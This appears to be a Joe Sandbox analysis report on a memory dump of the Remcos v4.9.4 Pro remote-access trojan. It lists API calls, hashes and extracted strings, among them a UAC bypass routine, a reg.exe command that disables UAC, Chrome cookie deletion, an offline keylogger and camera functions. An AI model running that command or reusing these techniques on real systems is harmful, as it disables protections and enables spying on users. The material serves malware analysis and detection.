                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: _free$ErrorFreeHeapLast
                                      • String ID:
                                      • API String ID: 776569668-0
                                      • Opcode ID: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
                                      • Instruction ID: 24198d243bcb3d58ae0bfa3c32327865a6a336b1368b597fbdd44e30390e4fdc
                                      • Opcode Fuzzy Hash: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
                                      • Instruction Fuzzy Hash: B8119631540714BAD921BB70CC85FCB779EEF0A702F444C54AEED6A050DAB4B9086F50
                                      APIs
                                      • GetLastError.KERNEL32(?,?,02B3A351,02B392BE), ref: 02B3A368
                                      • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 02B3A376
                                      • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 02B3A38F
                                      • SetLastError.KERNEL32(00000000,?,02B3A351,02B392BE), ref: 02B3A3E1
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ErrorLastValue___vcrt_
                                      • String ID:
                                      • API String ID: 3852720340-0
                                      • Opcode ID: 71b27c5cb110f8808198fb582e136ae3012972fa8547b38ae38e46f34f769595
                                      • Instruction ID: f2a358b40879beae630277bd48528a8a477f24a7e7d8bddeeca834bf6c01597b
                                      • Opcode Fuzzy Hash: 71b27c5cb110f8808198fb582e136ae3012972fa8547b38ae38e46f34f769595
                                      • Instruction Fuzzy Hash: 8D01D83259D7219FA7172A7C6CC4B6B3689EB027F573047A9F51C560D0EF5148149650
                                      APIs
                                      • CoInitializeEx.OLE32(00000000,00000002,00000000,C:\Windows\SysWOW64\rundll32.exe), ref: 02B075D0
                                        • Part of subcall function 02B074FD: _wcslen.LIBCMT ref: 02B07521
                                        • Part of subcall function 02B074FD: CoGetObject.OLE32(?,00000024,02B66518,00000000), ref: 02B07582
                                      • CoUninitialize.OLE32 ref: 02B07629
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: InitializeObjectUninitialize_wcslen
                                      • String ID: C:\Windows\SysWOW64\rundll32.exe$[+] ShellExec success$[+] before ShellExec$[+] ucmCMLuaUtilShellExecMethod
                                      • API String ID: 3851391207-386762680
                                      • Opcode ID: 2da01ef8ee773a9c0e1ca20589e1aa095f7575126b5370005fff207beda4d5c8
                                      • Instruction ID: 14b70468f54c658e9511d9c84f83cb8d17b58c05a518686c37bc140f4527f5d7
                                      • Opcode Fuzzy Hash: 2da01ef8ee773a9c0e1ca20589e1aa095f7575126b5370005fff207beda4d5c8
                                      • Instruction Fuzzy Hash: 0B01C0727006106BF2265B64EC8EF7BFB5CDB45729F14049EF50286081EFA4BC0159A1
                                      APIs
                                      • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Cookies), ref: 02B0BADD
                                      • GetLastError.KERNEL32 ref: 02B0BAE7
                                      Strings
                                      • \AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 02B0BAA8
                                      • [Chrome Cookies not found], xrefs: 02B0BB01
                                      • [Chrome Cookies found, cleared!], xrefs: 02B0BB0D
                                      • UserProfile, xrefs: 02B0BAAD
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: DeleteErrorFileLast
                                      • String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
                                      • API String ID: 2018770650-304995407
                                      • Opcode ID: 97aeac1c544feb629be84fbc40548e247db2eb6230c9371bcd1552f12c403464
                                      • Instruction ID: 8a029b667eaf79453a1ff5cfd01554ed6418f8971f7a1c2903b1704e5f0fa622
                                      • Opcode Fuzzy Hash: 97aeac1c544feb629be84fbc40548e247db2eb6230c9371bcd1552f12c403464
                                      • Instruction Fuzzy Hash: A901D631A802095B9B0ABBBDCCDB8FE7F2AEB11614B4001D5E813621E4FE564655CED2
                                      APIs
                                      • AllocConsole.KERNEL32(02B75338), ref: 02B1CDA4
                                      • ShowWindow.USER32(00000000,00000000), ref: 02B1CDBD
                                      • SetConsoleOutputCP.KERNEL32(000004E4), ref: 02B1CDE2
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Console$AllocOutputShowWindow
                                      • String ID: Remcos v$4.9.4 Pro$CONOUT$
                                      • API String ID: 2425139147-3065609815
                                      • Opcode ID: 3dc170323deb1ec13427ffc8d8f37196d7fb8864d3c93f1e434a45358711c1c8
                                      • Instruction ID: e1d6b3d2225677ec2cb6e2fda7240b485dee305cbd8fc19888b4fae492627cf3
                                      • Opcode Fuzzy Hash: 3dc170323deb1ec13427ffc8d8f37196d7fb8864d3c93f1e434a45358711c1c8
                                      • Instruction Fuzzy Hash: DB0184B1ED03087AE610FBF49C4EF5D7BBD9B10B41F500892B609AB081DFA496285AA1
                                      APIs
                                      • __allrem.LIBCMT ref: 02B3AC69
                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02B3AC85
                                      • __allrem.LIBCMT ref: 02B3AC9C
                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02B3ACBA
                                      • __allrem.LIBCMT ref: 02B3ACD1
                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02B3ACEF
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                      • String ID:
                                      • API String ID: 1992179935-0
                                      • Opcode ID: 62332627f6279ece4fdf0222086194dbbb93a47f3123b1b6f0685f97dcd8be1f
                                      • Instruction ID: b9b001a4f70e3c47eadea6a8c56ca10685f549b1e9bb4dadc0ce43bdb00c1fa0
                                      • Opcode Fuzzy Hash: 62332627f6279ece4fdf0222086194dbbb93a47f3123b1b6f0685f97dcd8be1f
                                      • Instruction Fuzzy Hash: 3981EB726007069BD726AF78CC81B9BB3EAEF40324F3445AAE595D7680FF74D9418B50
                                      APIs
                                        • Part of subcall function 02B1179C: SetLastError.KERNEL32(0000000D,02B11D1C,00000000,?,?,?,?,?,?,?,?,?,?,?,?,02B11CFA), ref: 02B117A2
                                      • SetLastError.KERNEL32(000000C1,00000000,?,?,?,?,?,?,?,?,?,?,?,?,02B11CFA), ref: 02B11D37
                                      • GetNativeSystemInfo.KERNEL32(?,02B0D2A2,00000000,?,?,?,?,?,?,?,?,?,?,?,?,02B11CFA), ref: 02B11DA5
                                      • SetLastError.KERNEL32(0000000E,?,?,?,?,?,?,?,?,?), ref: 02B11DC9
                                        • Part of subcall function 02B11CA3: VirtualAlloc.KERNEL32(00000040,00000040,00000040,00000040,02B11DE7,?,00000000,00003000,00000040,00000000,?,?), ref: 02B11CB3
                                      • GetProcessHeap.KERNEL32(00000008,00000040,?,?,?,?,?), ref: 02B11E10
                                      • HeapAlloc.KERNEL32(00000000,?,?,?,?,?), ref: 02B11E17
                                      • SetLastError.KERNEL32(0000045A,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 02B11F2A
                                        • Part of subcall function 02B12077: GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,02B11F37,?,?,?,?,?), ref: 02B120E7
                                        • Part of subcall function 02B12077: HeapFree.KERNEL32(00000000,?,?,?,?,?), ref: 02B120EE
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ErrorHeapLast$AllocProcess$FreeInfoNativeSystemVirtual
                                      • String ID:
                                      • API String ID: 3950776272-0
                                      • Opcode ID: f6b66e6a4b17ecb285dbe99e79364204a08ffe0e8ba57e5656a1f175f104b86b
                                      • Instruction ID: 337a82280b732f1fc210f7167936d702801ae65ae02e2b99310eeed5d023a486
                                      • Opcode Fuzzy Hash: f6b66e6a4b17ecb285dbe99e79364204a08ffe0e8ba57e5656a1f175f104b86b
                                      • Instruction Fuzzy Hash: 5C610271631611ABCB109F6DC980B7A7BAAFF84340F8441D9EB0D8B681E7B4D951CBD1
                                      APIs
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: __cftoe
                                      • String ID:
                                      • API String ID: 4189289331-0
                                      • Opcode ID: 57cf4f5ddb1b3c7462cd5a1f8c25b806bfc76ab8a3991aa24047be83fe5bf657
                                      • Instruction ID: 070b5ae10367c74d353348960caa0bae078adf51876212cbff44838dc90c0288
                                      • Opcode Fuzzy Hash: 57cf4f5ddb1b3c7462cd5a1f8c25b806bfc76ab8a3991aa24047be83fe5bf657
                                      • Instruction Fuzzy Hash: F9514B32900605ABDF359B68CCC0FAE77BAEF59334F9442DAE92592191DF30D500EBA4
                                      APIs
                                      • Sleep.KERNEL32(00001388), ref: 02B0A740
                                        • Part of subcall function 02B0A675: CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,02B0A74D), ref: 02B0A6AB
                                        • Part of subcall function 02B0A675: GetFileSize.KERNEL32(00000000,00000000,?,?,?,02B0A74D), ref: 02B0A6BA
                                        • Part of subcall function 02B0A675: Sleep.KERNEL32(00002710,?,?,?,02B0A74D), ref: 02B0A6E7
                                        • Part of subcall function 02B0A675: CloseHandle.KERNEL32(00000000,?,?,?,02B0A74D), ref: 02B0A6EE
                                      • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 02B0A77C
                                      • GetFileAttributesW.KERNEL32(00000000), ref: 02B0A78D
                                      • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 02B0A7A4
                                      • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00000012), ref: 02B0A81E
                                        • Part of subcall function 02B1C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,02B0A843), ref: 02B1C49E
                                      • SetFileAttributesW.KERNEL32(00000000,00000006,00000013,02B66468,?,00000000,00000000,00000000,00000000,00000000), ref: 02B0A927
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: File$AttributesCreate$Sleep$CloseDirectoryExistsHandlePathSize
                                      • String ID:
                                      • API String ID: 3795512280-0
                                      • Opcode ID: 328115eacb554513ed7772e559de828885bbe1e2309da8e4c4a285a7ef5b7a14
                                      • Instruction ID: 0a6209f1f5ac3fd9fe066dbc748373aa40200f465744e60e6d324f26a9b255bc
                                      • Opcode Fuzzy Hash: 328115eacb554513ed7772e559de828885bbe1e2309da8e4c4a285a7ef5b7a14
                                      • Instruction Fuzzy Hash: 31519C716143005BCB1BFB38C8E4ABE7FAB9F80344F4448D9AA87971D0DF2499498B92
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: __freea$__alloca_probe_16_free
                                      • String ID: a/p$am/pm
                                      • API String ID: 2936374016-3206640213
                                      • Opcode ID: 6604c0c9618d8238911851b5e276efbcd3c04aecfca8f5b56c0d6dce3fccd2cb
                                      • Instruction ID: a5fd259a7fc27e47061c3015e50ab00f7660f019484a3c51f3ce9ae4b8bb80ec
                                      • Opcode Fuzzy Hash: 6604c0c9618d8238911851b5e276efbcd3c04aecfca8f5b56c0d6dce3fccd2cb
                                      • Instruction Fuzzy Hash: 5BD11871910206EBDB288F68C8D4BBAF7B1FF09304F1841D9E645AB255DF359980FBA1
                                      APIs
                                      • std::_Lockit::_Lockit.LIBCPMT ref: 02B10E6E
                                      • int.LIBCPMT ref: 02B10E81
                                        • Part of subcall function 02B0E0C1: std::_Lockit::_Lockit.LIBCPMT ref: 02B0E0D2
                                        • Part of subcall function 02B0E0C1: std::_Lockit::~_Lockit.LIBCPMT ref: 02B0E0EC
                                      • std::_Facet_Register.LIBCPMT ref: 02B10EC1
                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 02B10ECA
                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 02B10EE8
                                      • __Init_thread_footer.LIBCMT ref: 02B10F29
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_Init_thread_footerRegisterThrow
                                      • String ID:
                                      • API String ID: 3815856325-0
                                      • Opcode ID: df589e5d3bda7642570d8daa35390c4e5d47cf8298c5daabdfcf9759a221223d
                                      • Instruction ID: b4739bdf8287f17bcacf1f1b06bd4c8161b1bda41d24a728bf0ea082e260addd
                                      • Opcode Fuzzy Hash: df589e5d3bda7642570d8daa35390c4e5d47cf8298c5daabdfcf9759a221223d
                                      • Instruction Fuzzy Hash: 0A213533910514DBCB15FB68E885DAE7BBAEF45320B6009D6E810A72D0DF31AA81CF90
                                      APIs
                                      • OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,00000000,?,?,?,02B1A38E,00000000), ref: 02B1AC88
                                      • OpenServiceW.ADVAPI32(00000000,00000000,00000002,?,?,?,02B1A38E,00000000), ref: 02B1AC9C
                                      • CloseServiceHandle.ADVAPI32(00000000,?,?,?,02B1A38E,00000000), ref: 02B1ACA9
                                      • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,02B1A38E,00000000), ref: 02B1ACDE
                                      • CloseServiceHandle.ADVAPI32(00000000,?,?,?,02B1A38E,00000000), ref: 02B1ACF0
                                      • CloseServiceHandle.ADVAPI32(00000000,?,?,?,02B1A38E,00000000), ref: 02B1ACF3
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Service$CloseHandle$Open$ChangeConfigManager
                                      • String ID:
                                      • API String ID: 493672254-0
                                      • Opcode ID: ac3f9efd1811d306b49f21dfb5580faca07145983ea51d553450fb2a47c741a6
                                      • Instruction ID: b5689bbd517f382e23ed0952ea1537a9c6dd1e670f22c340a9ef9b4a558c39ed
                                      • Opcode Fuzzy Hash: ac3f9efd1811d306b49f21dfb5580faca07145983ea51d553450fb2a47c741a6
                                      • Instruction Fuzzy Hash: EB014531586224BBD6110B389C4DFBA3B6CDF422B0F440785F926DB1C0DB60EA00E5E4
                                      APIs
                                      • GetLastError.KERNEL32(00000020,?,02B3A7F5,?,?,?,02B3F9A8,?,?,00000020,00000000,?,?,?,02B2DD01,0000003B), ref: 02B48219
                                      • _free.LIBCMT ref: 02B4824C
                                      • _free.LIBCMT ref: 02B48274
                                      • SetLastError.KERNEL32(00000000,02B3F9A8,?,?,00000020,00000000,?,?,?,02B2DD01,0000003B,?,00000041,00000000,00000000), ref: 02B48281
                                      • SetLastError.KERNEL32(00000000,02B3F9A8,?,?,00000020,00000000,?,?,?,02B2DD01,0000003B,?,00000041,00000000,00000000), ref: 02B4828D
                                      • _abort.LIBCMT ref: 02B48293
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ErrorLast$_free$_abort
                                      • String ID:
                                      • API String ID: 3160817290-0
                                      • Opcode ID: 2b0723e465d7ae2993aa8abe02c697d33169ced0abe3707eab5f42e97358be01
                                      • Instruction ID: e167da38e3cd004c5b9d57fccdd0a3816a2d4a99906a4f96b1ce4dacc99193b6
                                      • Opcode Fuzzy Hash: 2b0723e465d7ae2993aa8abe02c697d33169ced0abe3707eab5f42e97358be01
                                      • Instruction Fuzzy Hash: 81F0A436544F106BDB5232297CC4F6A261ADFC27A5F280A94FDA897280EF64CC45B5A0
                                      APIs
                                      • OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,00000001,?,?,?,?,?,?,02B1A623,00000000), ref: 02B1AAB5
                                      • OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,02B1A623,00000000), ref: 02B1AAC9
                                      • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,02B1A623,00000000), ref: 02B1AAD6
                                      • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,02B1A623,00000000), ref: 02B1AAE5
                                      • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,02B1A623,00000000), ref: 02B1AAF7
                                      • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,02B1A623,00000000), ref: 02B1AAFA
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Service$CloseHandle$Open$ControlManager
                                      • String ID:
                                      • API String ID: 221034970-0
                                      • Opcode ID: 4287390d87fbf65560e8a287e1eb892f182c18881746004f130c7197d8f4a248
                                      • Instruction ID: 1e850cefa9ae33290f659bda536af2bc8cbb3bbe4cf8943b2524eb808de7a863
                                      • Opcode Fuzzy Hash: 4287390d87fbf65560e8a287e1eb892f182c18881746004f130c7197d8f4a248
                                      • Instruction Fuzzy Hash: EAF0C231991628ABD711AB24AC88FBF3B6CDF452A0F440455FD0987181DB649D5599E0
                                      APIs
                                      • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,02B1A5A3,00000000), ref: 02B1ABB9
                                      • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,02B1A5A3,00000000), ref: 02B1ABCD
                                      • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,02B1A5A3,00000000), ref: 02B1ABDA
                                      • ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,02B1A5A3,00000000), ref: 02B1ABE9
                                      • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,02B1A5A3,00000000), ref: 02B1ABFB
                                      • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,02B1A5A3,00000000), ref: 02B1ABFE
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Service$CloseHandle$Open$ControlManager
                                      • String ID:
                                      • API String ID: 221034970-0
                                      • Opcode ID: 96df8f9e74181d3bd6dadc42ff3f8ea4c28f4f2f476afd26a7f32a0089c07a99
                                      • Instruction ID: d7041ee82319839c37b420a2cd7e99264121fd8ec21e9d05533e96bd357e9451
                                      • Opcode Fuzzy Hash: 96df8f9e74181d3bd6dadc42ff3f8ea4c28f4f2f476afd26a7f32a0089c07a99
                                      • Instruction Fuzzy Hash: 4EF0C231981628ABD6116B249C89EBF3B6CDF453A0F440455FE099B140DB289D15D9F0
                                      APIs
                                      • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,02B1A523,00000000), ref: 02B1AC20
                                      • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,02B1A523,00000000), ref: 02B1AC34
                                      • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,02B1A523,00000000), ref: 02B1AC41
                                      • ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,02B1A523,00000000), ref: 02B1AC50
                                      • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,02B1A523,00000000), ref: 02B1AC62
                                      • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,02B1A523,00000000), ref: 02B1AC65
                                      • API ID: Service$CloseHandle$Open$ControlManager
                                      APIs
                                        • Part of subcall function 02B1361B: RegOpenKeyExW.ADVAPI32(80000001,00000400,00000000,00020019,?,02B750E4), ref: 02B1363D
                                        • Part of subcall function 02B1361B: RegQueryValueExW.ADVAPI32(?,02B0F313,00000000,00000000,?,00000400), ref: 02B1365C
                                        • Part of subcall function 02B1361B: RegCloseKey.ADVAPI32(?), ref: 02B13665
                                        • Part of subcall function 02B1BFB7: GetCurrentProcess.KERNEL32(?,?,?,02B0DAAA,WinDir,00000000,00000000), ref: 02B1BFC8
                                      • _wcslen.LIBCMT ref: 02B1B763
                                      • API ID: CloseCurrentOpenProcessQueryValue_wcslen
                                      • String ID: .exe$http\shell\open\command$program files (x86)\$program files\
                                      APIs
                                      • GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 02B0B172
                                      • wsprintfW.USER32 ref: 02B0B1F3
                                        • Part of subcall function 02B0A636: SetEvent.KERNEL32(?,?,00000000,02B0B20A,00000000), ref: 02B0A662
                                      • API ID: EventLocalTimewsprintf
                                      • String ID: [%04i/%02i/%02i %02i:%02i:%02i $Offline Keylogger Started$]
                                      APIs
                                      • RegisterClassExA.USER32(00000030), ref: 02B1D55B
                                      • CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 02B1D576
                                      • GetLastError.KERNEL32 ref: 02B1D580
                                      • API ID: ClassCreateErrorLastRegisterWindow
                                      • String ID: 0$MsgWindowClass
                                      APIs
                                      • CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 02B0779B
                                      • CloseHandle.KERNEL32(?), ref: 02B077AA
                                      • CloseHandle.KERNEL32(?), ref: 02B077AF
                                      Strings
                                      • C:\Windows\System32\cmd.exe, xrefs: 02B07796
                                      • /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 02B07791
                                      • API ID: CloseHandle$CreateProcess
                                      • String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe
                                      APIs
                                      • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,02B432EB,?,?,02B4328B,?), ref: 02B4335A
                                      • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 02B4336D
                                      • FreeLibrary.KERNEL32(00000000,?,?,?,02B432EB,?,?,02B4328B,?), ref: 02B43390
                                      • API ID: AddressFreeHandleLibraryModuleProc
                                      • String ID: CorExitProcess$mscoree.dll
                                      APIs
                                      • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 02B05120
                                      • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,02B04E7A,00000001), ref: 02B0512C
                                      • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,02B04E7A,00000001), ref: 02B05137
                                      • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,02B04E7A,00000001), ref: 02B05140
                                        • Part of subcall function 02B1B4EF: GetLocalTime.KERNEL32(00000000), ref: 02B1B509
                                      • API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
                                      • String ID: KeepAlive | Disabled
                                      APIs
                                        • Part of subcall function 02B1B4EF: GetLocalTime.KERNEL32(00000000), ref: 02B1B509
                                      • GetModuleHandleA.KERNEL32(00000000,00020009), ref: 02B1ADF2
                                      • PlaySoundW.WINMM(00000000,00000000), ref: 02B1AE00
                                      • Sleep.KERNEL32(00002710), ref: 02B1AE07
                                      • PlaySoundW.WINMM(00000000,00000000,00000000), ref: 02B1AE10
                                      • API ID: PlaySound$HandleLocalModuleSleepTime
                                      • String ID: Alarm triggered
                                      APIs
                                      • GetStdHandle.KERNEL32(000000F5,00000000,?,?,?,?,?,?,02B1CDED), ref: 02B1CD62
                                      • GetConsoleScreenBufferInfo.KERNEL32(00000000,?,?,?,?,?,?,?,02B1CDED), ref: 02B1CD6F
                                      • SetConsoleTextAttribute.KERNEL32(00000000,0000000C,?,?,?,?,?,?,02B1CDED), ref: 02B1CD7C
                                      • SetConsoleTextAttribute.KERNEL32(00000000,?,?,?,?,?,?,?,02B1CDED), ref: 02B1CD8F
                                      Strings
                                      • ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/ , xrefs: 02B1CD82
                                      • API ID: Console$AttributeText$BufferHandleInfoScreen
                                      • String ID: ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/
                                      APIs
                                      • Sleep.KERNEL32(00000000,02B0D262), ref: 02B044C4
                                        • Part of subcall function 02B04607: __EH_prolog.LIBCMT ref: 02B0460C
                                      • API ID: H_prologSleep
                                      • String ID: CloseCamera$FreeFrame$GetFrame$OpenCamera
                                      APIs
                                        • Part of subcall function 02B46137: RtlAllocateHeap.NTDLL(00000000,02B3529C,?,?,02B38847,?,?,00000000,?,?,02B0DE62,02B3529C,?,?,?,?), ref: 02B46169
                                      • _free.LIBCMT ref: 02B44E06
                                      • _free.LIBCMT ref: 02B44E1D
                                      • _free.LIBCMT ref: 02B44E3C
                                      • _free.LIBCMT ref: 02B44E57
                                      • _free.LIBCMT ref: 02B44E6E
                                      • API ID: _free$AllocateHeap
                                      APIs
                                        • Part of subcall function 02B1BFB7: GetCurrentProcess.KERNEL32(?,?,?,02B0DAAA,WinDir,00000000,00000000), ref: 02B1BFC8
                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 02B0F91B
                                      • Process32FirstW.KERNEL32(00000000,?), ref: 02B0F93F
                                      • Process32NextW.KERNEL32(00000000,0000022C), ref: 02B0F94E
                                      • CloseHandle.KERNEL32(00000000), ref: 02B0FB05
                                        • Part of subcall function 02B1BFE5: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,02B0F5F9,00000000,?,?,02B75338), ref: 02B1BFFA
                                        • Part of subcall function 02B1C1DD: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 02B1C1F5
                                        • Part of subcall function 02B1C1DD: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 02B1C208
                                      • Process32NextW.KERNEL32(00000000,0000022C), ref: 02B0FAF6
                                      • API ID: Process$OpenProcess32$Next$CloseCreateCurrentFirstHandleSnapshotToolhelp32
                                      APIs
                                      • API ID: _free
                                      APIs
